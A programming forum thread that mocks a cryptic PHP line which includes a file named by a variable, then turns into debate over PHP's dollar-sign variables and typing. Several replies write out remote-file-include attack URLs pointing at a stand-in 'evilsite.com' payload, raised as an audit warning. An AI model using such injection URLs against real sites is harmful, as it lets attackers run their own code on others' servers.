Can you fix these bugs asap



  • My company took over a maintenance of a site. Enough said.

    Now something  goes wrong, and I have to dig through atrocities like this Bondlike one-liner:

    <? if(isset($sdfsdf) && ($sdfsdf == 'qsdqsdqsd')) {  include($sitevars[$passedvalue]); } ?>

     
    Please don't say "the real wtf is using php". It's not. You can do beautiful stuff with php.
     



  • The real wtf is using ph...oh wait...sorry!



  • @Kiss me I'm Polish said:

    Please don't say "the real wtf is using php". It's not. You can do beautiful stuff with php.

    You say that like WTF's aren't beautiful, some are.



  • The real WTF is that he misspelled qsdqsdqsdd as qsdqsdqsd... Pfft what a loser does not even know mumbo-jumbo well!

    Plus nobody spells sdffds as sdfsdf anymore. What is this guy from the stone age? 



  • @Kiss me I'm Polish said:

    My company took over a maintenance of a site. Enough said.

    Now something  goes wrong, and I have to dig through atrocities like this Bondlike one-liner:

    <? if(isset($sdfsdf) && ($sdfsdf == 'qsdqsdqsd')) {  include($sitevars[$passedvalue]); } ?>

     
    Please don't say "the real wtf is using php". It's not. You can do beautiful stuff with php.
     

    Watch out for remote file include vulnerabilities in that, too. Can a malicious user go to "thatpage.php?sdfsdf=qsdqsdqsd&sitevars[$passedvalue]=http://evilsite.com/rfi.txt"?



  • @rbowes said:

    @Kiss me I'm Polish said:

    <? if(isset($sdfsdf) && ($sdfsdf == 'qsdqsdqsd')) {  include($sitevars[$passedvalue]); } ?>

    Watch out for remote file include vulnerabilities in that, too. Can a malicious user go to "thatpage.php?sdfsdf=qsdqsdqsd&sitevars[$passedvalue]=http://evilsite.com/rfi.txt"?

    Depends on where $sitevars is populated, and with what. Unless they're sticking one of the _POST/_GET/_REQUEST superglobals in there, it could be perfectly innocent. Thankfully PHP now defaults to register_globals being off (I'd like to treat the moron who came up with that to some waterboarding, followed by boiling in oil, concluding with an intimate encounter with industrial food grinders), so automatic variable injection isn't as big a problem on "modern" installs of PHP as it used to be. Of course, lazy (and stupid) programmers abound and will insist on turning it back on, because it saves them a few lines of code.


     



  • @MarcB said:

    @rbowes said:
    @Kiss me I'm Polish said:

    <? if(isset($sdfsdf) && ($sdfsdf == 'qsdqsdqsd')) {  include($sitevars[$passedvalue]); } ?>

    Watch out for remote file include vulnerabilities in that, too. Can a malicious user go to "thatpage.php?sdfsdf=qsdqsdqsd&sitevars[$passedvalue]=http://evilsite.com/rfi.txt"?

    Depends on where $sitevars is populated, and with what. Unless they're sticking one of the _POST/_GET/_REQUEST superglobals in there, it could be perfectly innocent. Thankfully PHP now defaults to register_globals being off (I'd like to treat the moron who came up with that to some waterboarding, followed by boiling in oil, concluding with an intimate encounter with industrial food grinders), so automatic variable injection isn't as big a problem on "modern" installs of PHP as it used to be. Of course, lazy (and stupid) programmers abound and will insist on turning it back on, because it saves them a few lines of code.


     

    It's not a big problem, but like I said, it's something to watch out for. include()'ing a variable, especially in code of that caliber, is a big warning sign when I'm auditing. :)</p?



  • The real WTF is using inline PHP. Nothing good comes from a PHP file that doesn't start and end with the PHP tag.



  • @j6cubic said:

    The real WTF is using inline PHP. Nothing good comes from a PHP file that doesn't start and end with the PHP tag.

     

    Wait, I thought inlining was the whole point of PHP?  Otherwise, why not use a real language? 



  • @seaturnip said:

    @j6cubic said:

    The real WTF is using inline PHP. Nothing good comes from a PHP file that doesn't start and end with the PHP tag.

     

    Wait, I thought inlining was the whole point of PHP?  Otherwise, why not use a real language? 

    I use it because it is significantly easier to use than any other language I've used, the documentation is just there. Inlining is considered bad form, especially since smarty is available.


  • @Lingerance said:

    @seaturnip said:

    @j6cubic said:

    The real WTF is using inline PHP. Nothing good comes from a PHP file that doesn't start and end with the PHP tag.

     

    Wait, I thought inlining was the whole point of PHP?  Otherwise, why not use a real language? 

    I use it because it is significantly easier to use than any other language I've used, the documentation is just there. Inlining is considered bad form, especially since smarty is available.

     I consider Python to be easier to learn than PHP, and I've been working with PHP a lot longer than I have with Python. It has a much better standard function library than PHP,  seeing as PHP's function library is very poorly modularized and follows absolutely no standards with regards to function naming, return values, parameter ordering, etc. PHP's only saving grace in this regard is its fantastic online documentation, which unfortunately Python has yet to match (although Python's support for docstrings make an online manual much less of a necessity). Also, I find Python's syntax to be more intuitive than PHP's mismash of Perl, C, and Java, although that's more subjective.

    Oh, and the closing tag (?>) for a PHP file is optional.  It's actually better to leave it out for files that are included, because if you don't you'll run into problems if there's whitespace after the ?> and the file is included before headers are sent. Whitespace after the closing ?> causes PHP to send the headers for that page, and attempting to output any headers after that (by, say, calling session_start()) will cause a PHP error. This can be tricky to debug, and I say that from experience. Of course, if you use a sane language, you don't have to worry about such things.



  • The real WTF is using PHP and thinking you can do beautiful stuff with it.

    PHP is disgustingly ugly, all beauty you can get with it is superficial. 



  • @ammoQ said:

    PHP is disgustingly ugly, all beauty you can get with it is superficial. 

    Is there any other kind? 



  • @asuffield said:

    @ammoQ said:

    PHP is disgustingly ugly, all beauty you can get with it is superficial. 

    Is there any other kind? 

    Well, if you were to create an artwork using dyes, or perhaps a mosaic of quarry tiles, or something using pieces of different woods, then any beauty present would unarguably be in the full (physical) depth of the work.



  • @MrMan said:

    I consider Python to be easier to learn than PHP, and I've been working with PHP a lot longer than I have with Python. It has a much better standard function library than PHP,  seeing as PHP's function library is very poorly modularized and follows absolutely no standards with regards to function naming, return values, parameter ordering, etc. PHP's only saving grace in this regard is its fantastic online documentation, which unfortunately Python has yet to match (although Python's support for docstrings make an online manual much less of a necessity). Also, I find Python's syntax to be more intuitive than PHP's mismash of Perl, C, and Java, although that's more subjective.

    I totally agree with the exception of the part about syntax. Python's whitespace-sensitivity is something I might eventually get used to, but don't want to. The while...else construct was also a big turn-off for me.

    PHP's syntax isn't that bad (at least all variables start with $), but I want to shoot whoever came up with the "-string parsing rules. Also I'm never sure whether to escape that \ when using the regex functions.

    I find PHP good for writin quick one-time utilities, shell scripts, some DB maintenance. The MB (multi-byte string) library is also very powerful and handy (though I must admit, somewhat hard to use.)

    It's been a while since I've done any web programming with PHP - but I'm sure I'd try to exhaust all the other possibilities before choosing PHP nowadays.



  • @asuffield said:

    @ammoQ said:

    PHP is disgustingly ugly, all beauty you can get with it is superficial. 

    Is there any other kind? 

    What?

     

    @aib said:

    PHP's syntax isn't that bad (at least all variables start with $)

    But that's part of what's insane about it.

     



  • @asuffield said:

    @ammoQ said:

    PHP is disgustingly ugly, all beauty you can get with it is superficial. 

    Is there any other kind? 

    Yes. There can be beauty below the surface. I'm sure you are someone who can appreciate that. 



  • @aib said:

    PHP's syntax isn't that bad (at least all variables start with $),

    IMO $variable is by far the worst part of PHPs syntax. Completely pointless. Except shells, where some characters without the $ are just strings, and Perl, which uses $ along with other prefixes to implicitely declare the type of a variable, no other language needs that.

    For some strange reason, in PHP this was mixed with a C-like syntax, which is ugly too, just to save a few keystrokes. Now you have a language that inherits all the uglyness of C, but wastes the supposed typing-efficiency by requiring a $ sign in front of every variable, possibly the most often used syntactical item at all.
     



  • I think adding symbols to variable names makes the language much more readable, although I think Perl takes it a bit too far by having 3.



  • @Cap'n Steve said:

    I think adding symbols to variable names makes the language much more readable, although I think Perl takes it a bit too far by having 3.

    I fail to see why symbols make variable names more readable. Variables are not exactly uncommon in procedural languages, so why explicitely mark them?


     


  • Discourse touched me in a no-no place

    @ammoQ said:

    @Cap'n Steve said:

    I think adding symbols to variable names makes the language much more readable, although I think Perl takes it a bit too far by having 3.

    I fail to see why symbols make variable names more readable. Variables are not exactly uncommon in procedural languages, so why explicitely mark them?

     Because you need some method to differentiate between your scalar variable called foobar, the array foobar and the function foobar?



  • @rbowes said:

    @Kiss me I'm Polish said:

    <? if(isset($sdfsdf) && ($sdfsdf == 'qsdqsdqsd')) {  include($sitevars[$passedvalue]); } ?>

    Watch out for remote file include vulnerabilities in that, too. Can a malicious user go to "thatpage.php?sdfsdf=qsdqsdqsd&sitevars[$passedvalue]=http://evilsite.com/rfi.txt"?

    register_globals FTL. But then you are not even using that correctly. It would have to have been ?sdfsdf=qsdqsdqsd&passedvalue=foo&sitevars[foo]=http://evilsite.com/rfi.txt

    I would assume that $sitevars is a global array containing key=>filename where the key is something like ?passedvalue=abc. So if you try ?passedvalue=xyz and there is no xyz in $sitevars then null will be included so there is a possible warning, but nothing too bad. 



  • @PJH said:

    @ammoQ said:

    @Cap'n Steve said:

    I think adding symbols to variable names makes the language much more readable, although I think Perl takes it a bit too far by having 3.

    I fail to see why symbols make variable names more readable. Variables are not exactly uncommon in procedural languages, so why explicitely mark them?

     Because you need some method to differentiate between your scalar variable called foobar, the array foobar and the function foobar?

    If I was braindead enouth to have a scalar variable called foobar, an array called foobar and a function called foobar, I could just as well use a prefix like sFoobar, aFoobar, fFoobar to differentiate between them. Not more work than that stupid $ sign.


     



  • The dollar signs let you pick out variables at a glance, and they also let you do things like leave the parentheses off subroutine calls (although I think that's kind of ugly) and use words that would otherwise be reserved as variables.


  • Discourse touched me in a no-no place

    @ammoQ said:

    @PJH said:
    @ammoQ said:
    @Cap'n Steve said:
    I think adding symbols to variable names makes the language much more readable, although I think Perl takes it a bit too far by having 3.
    I fail to see why symbols make variable names more readable. Variables are not exactly uncommon in procedural languages, so why explicitely mark them?
    Because you need some method to differentiate between your scalar variable called foobar, the array foobar and the function foobar?
    If I was braindead enouth to have a scalar variable called foobar, an array called foobar and a function called foobar, <snip>
    I see my humour tags disappeared after I hit post... I was rather expecting comments about why Perl actually allows this.



  • @ammoQ said:

    @asuffield said:
    @ammoQ said:

    PHP is disgustingly ugly, all beauty you can get with it is superficial. 

    Is there any other kind? 

    Yes. There can be beauty below the surface. I'm sure you are someone who can appreciate that. 

    I can certainly appreciate the philosophical argument that has been going on for the past couple thousand years about whether or not this is actually true. It's one of the classics.



  • @Cap'n Steve said:

    The dollar signs let you pick out variables at a glance

    Really, who needs that?

    and they also let you do things like leave the parentheses off subroutine calls (although I think that's kind of ugly)

    Several other languages manage to find out whether "foobar" is a variable or a function without the $ sign. Because the same name can not be used for both at the same time.

    and use words that would otherwise be reserved as variables.

    Any other prefix would do, too, in those cases when you really want that. 

     



  • @ammoQ said:

    @Cap'n Steve said:

    I think adding symbols to variable names makes the language much more readable, although I think Perl takes it a bit too far by having 3.

    I fail to see why symbols make variable names more readable. Variables are not exactly uncommon in procedural languages, so why explicitely mark them?
    Now there's a possible idea for a coder challenge. Perform some task that would normally need a load of variables, without using any.



  • @Cap'n Steve said:

    I think adding symbols to variable names makes the language much more readable, although I think Perl takes it a bit too far by having 3.

    I'm personally against marking variables in such a way, but at least it's consistent ($) in PHP. Perl loses with 3 (3?) symbols, and C got it right with none. (But that's my opinion)

    Then again, I think every variable ever used should be declared (_with_ type information, else there's no point) so some people may not agree with me.

     

    I think PHP's syntax is fine; apart from the $ thing and maybe a few array and function pointer stuff, they got it just right. It's not a soup (as we say in Turkish) like Perl, it's got enough to look and behave like C code and still be useful as a scripting language.

    If I had a couple of thousand dollars every time I forgot the $ in PHP, I'd probably never have to work again. Hey, I'm not a vending machine.



  • @aib said:

    Then again, I think every variable ever used should be declared (with type information, else there's no point) so some people may not agree with me.

    Are you referring to the argument between strong typing and duck typing?  Cuz many ruby enthusiasts love not having to explicitly type everything.  Like if an integer gets too big, ruby automatically switches it to a BigInt.  Personally, I like strong typing, mostly because I'm a control freak who likes to spell everything out explicitly and leave nothing to question.



  • @Cap'n Steve said:

    The dollar signs let you pick out variables at a glance, and they also let you do things like leave the parentheses off subroutine calls (although I think that's kind of ugly) and use words that would otherwise be reserved as variables.

    If you remove function calls and reserved words then you have variables left.  Is it really so hard to recognize function_calls() and if/else/while that the $ is needed to set variables apart?
     



  • @belgariontheking said:

    Personally, I like strong typing, mostly because I'm a control freak who likes to spell everything out explicitly and leave nothing to question.

    Is there even an interpreted language other than ch that has strong typing?



  • @Lingerance said:

    @belgariontheking said:
    Personally, I like strong typing, mostly because I'm a control freak who likes to spell everything out explicitly and leave nothing to question.
    Is there even an interpreted language other than ch that has strong typing?

    Java is an interpreted language.  It's also a compiled language.   



  • @belgariontheking said:

    Java is an interpreted language.  It's also a compiled language.   

    1998 called, they want their community college comp-sci curriculum back.



  • @Kiss me I'm Polish said:

    You can do beautiful stuff with php.

    But not this PHP ;-) 



  • @m0ffx said:

    Now there's a possible idea for a coder challenge. Perform some task that would normally need a load of variables, without using any.

    It would be trivial - implement it in Haskell, or one of a few other pure-functional languages. Haskell doesn't really have variables and most of the others don't really use them.

    Several of the more powerful 'conventional' languages can support programming in the same style, notably including perl. 



  • @belgariontheking said:

    @aib said:

    Then again, I think every variable ever used should be declared (with type information, else there's no point) so some people may not agree with me.

    Are you referring to the argument between strong typing and duck typing?  Cuz many ruby enthusiasts love not having to explicitly type everything.  Like if an integer gets too big, ruby automatically switches it to a BigInt.

    That's autoboxing, it's not directly related to the choice of typing paradigm. You can do that in most of them. 



  • @asuffield said:

    @belgariontheking said:
    @aib said:

    Then again, I think every variable ever used should be declared (with type information, else there's no point) so some people may not agree with me.

    Are you referring to the argument between strong typing and duck typing?  Cuz many ruby enthusiasts love not having to explicitly type everything.  Like if an integer gets too big, ruby automatically switches it to a BigInt.

    That's autoboxing, it's not directly related to the choice of typing paradigm. You can do that in most of them. 

    Yes, Python (among others) has the exact same transparent conversion behavior.



  • @belgariontheking said:

    @aib said:

    Then again, I think every variable ever used should be declared (with type information, else there's no point) so some people may not agree with me.

    Are you referring to the argument between strong typing and duck typing?  Cuz many ruby enthusiasts love not having to explicitly type everything.  Like if an integer gets too big, ruby automatically switches it to a BigInt.  Personally, I like strong typing, mostly because I'm a control freak who likes to spell everything out explicitly and leave nothing to question.

    Between strong and weak typing, if I'm not mistaken. I have a tendancy to occasionally avoid technical terms lest they result in a battle of definitions and semantics. Looking up strong/weak/duck typing in Wikipedia to be more precise, I see:

    @Wikipedia on 'Strongly-typed programming language' said:

     

    Programming language expert Benjamin C. Pierce, author of Types and Programming Languages and Advanced Types and Programming Languages, has said:

    "I spent a few weeks... trying to sort out the terminology of "strongly typed," "statically typed," "safe," etc., and found it amazingly difficult.... The usage of these terms is so various as to render them almost useless."

    so apparently my instincts served me well.

    Anyway, I like strict type and scope rules since they make it easier to maintain your code and find those bugs that you unavoidably introduce after hours of coding.

    Worst behavior I've seen is that of Actionscript 3.0:

    for (var x:uint=0; x<10; x++) ...

    Not only will 'x' remain in scope outside the for loop, if you try to do that a second time, you'll get a warning for duplicate variable definition...


Log in to reply